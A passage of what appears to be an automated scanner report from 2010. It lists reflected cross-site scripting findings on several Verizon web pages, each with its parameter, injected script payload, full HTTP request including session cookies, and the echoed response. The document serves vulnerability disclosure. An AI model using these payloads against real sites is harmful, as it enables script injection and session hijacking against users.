Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:37 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.102. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.verizon.net
Path:   /ssowebapp/VOLPortalLogin

Issue detail

The value of the clientId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983ec"><script>alert(1)</script>841594c598 was submitted in the clientId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ssowebapp/VOLPortalLogin?stid=off&clientId=cnsmrshp983ec"><script>alert(1)</script>841594c598&TARGET=http%3a%2f%2fsurround.verizon.net%2fshop%2fshopRedirect.aspx%3foid%3dVX765 HTTP/1.1
Host: www.verizon.net
Connection: keep-alive
Referer: http://surround.verizon.net/Shop/featuredOffers/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; ASPSESSIONIDQATSQSBC=MEKENDBDIDAPOCCODLFOHPEE; NEWSROOMAPPID=kV3wMnpRBGZtF47vYMhnC6H01yDyknH7BDQrjhgzl9X05vXG1xV1!1633138470; lob=webmail; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210674565:ss=1290210227164; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:16:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:16:23 GMT
Connection: keep-alive
Set-Cookie: VZSSO_SESSIONID=GZFyMnvXscXgyJwMnppC9Y8Qnl9rrgznxGLLcNvxtXFP68WvTmrC!703478465; path=/
Set-Cookie: lob=consumer; domain=verizon.net; path=/
Set-Cookie: AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; domain=verizon.net; path=/
Set-Cookie: ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; domain=verizon.net; path=/
Content-Length: 29010


<!-- Instance name: sso3a -->


<html>

<head>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Sign In</titl
...[SNIP]...
<input type="hidden" name="clientId" value="cnsmrshp983ec"><script>alert(1)</script>841594c598" />
...[SNIP]...

3.103. http://www.verizonwireless.com/b2c/store/controller [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159a9"><script>alert(1)</script>cea6d5d8c05 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217532779; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

3.104. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the deviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd574"><script>alert(1)</script>6360605e49 was submitted in the deviceType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217537902; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort" />
...[SNIP]...

3.105. http://www.verizonwireless.com/b2c/store/controller [item parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the item request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf659"><script>alert(1)</script>df6912777c8 was submitted in the item parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217526081; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

3.106. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04d3"><script>alert(1)</script>cc1eed593b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:52 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217552301; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1" />
...[SNIP]...

3.107. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the sortOption request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f90f"><script>alert(1)</script>154bd675ac6 was submitted in the sortOption parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:42 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217542028; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6" />
...[SNIP]...

3.108. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b92a(a)3fb18037f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal2b92a(a)3fb18037f68/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=3Wv1Mn7dQ3C2rWTzcFFqCm50vMk5HvpjbhG9JWDGq3vsWv8NptVn!-2072702529; path=/

Resource /SMBPortal2b92a(a)3fb18037f68/smb could not be resolved for locale null.

3.109. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b793e(a)11cbe181d16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbb793e(a)11cbe181d16?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=RQNpMn7dCvNNTPY5T5Hy0PGmqJrhpX4vKCMRrnr7kQRgpSVl5sy3!-1644393018; path=/

Resource /SMBPortal/smbb793e(a)11cbe181d16 could not be resolved for locale null.

3.110. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ba5'-alert(1)-'185cc5084d0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6BFkMn7cQlKLsvfzxSGcmYJpLqLvp8BpnKlLwn40STNYtD5rY6v1!1950273172; path=/
Content-Length: 112566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
aderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

3.111. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>450552b46bf request parameter is copied into the HTML document as plain text between tags. The payload 30dd7<script>alert(1)</script>5e4c65629c4 was submitted in the 3828e"><script>alert(1)</script>450552b46bf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA14V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:54:22 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=85ff4439-03f7-4614-a14f-6076686da86b; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6cf45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 00:59:22 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47385


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4" name="target">
...[SNIP]...

3.112. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

